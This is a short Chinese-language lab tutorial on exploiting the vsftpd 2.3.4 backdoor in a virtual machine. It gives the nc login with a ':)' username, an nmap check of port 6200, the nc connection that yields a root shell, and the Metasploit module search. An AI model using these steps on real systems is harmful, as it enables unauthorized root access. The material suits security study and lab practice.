一、Ftp笑脸漏洞原理
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
二.操作
1.在虚拟机中查看ip
2.查看6200端口开放情况
是closed,没有开放。
3.查看21端口FTP服务的版本信息
21端口,vsftpd 2.3.4
4.用nc连接21端口并通过笑脸漏洞登录
nc 192.168.142.132 21
user处:)回车
pass处随意输入即可回车
注意:这里需要手动输入,此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会随之关闭
5.查看6200端口是否开放
这里需要另起一个端口
nmap -p 6200 192.168.142.132
open即为开发了,可以连接
6.连接6200端口获得shell
nc 192.168.142.132 6200
三.用msfconsole利用漏洞
1.打开msfconsole
2.寻找vsftpd
search vsftpd
3.使用漏洞,输入指示命令
use 1即可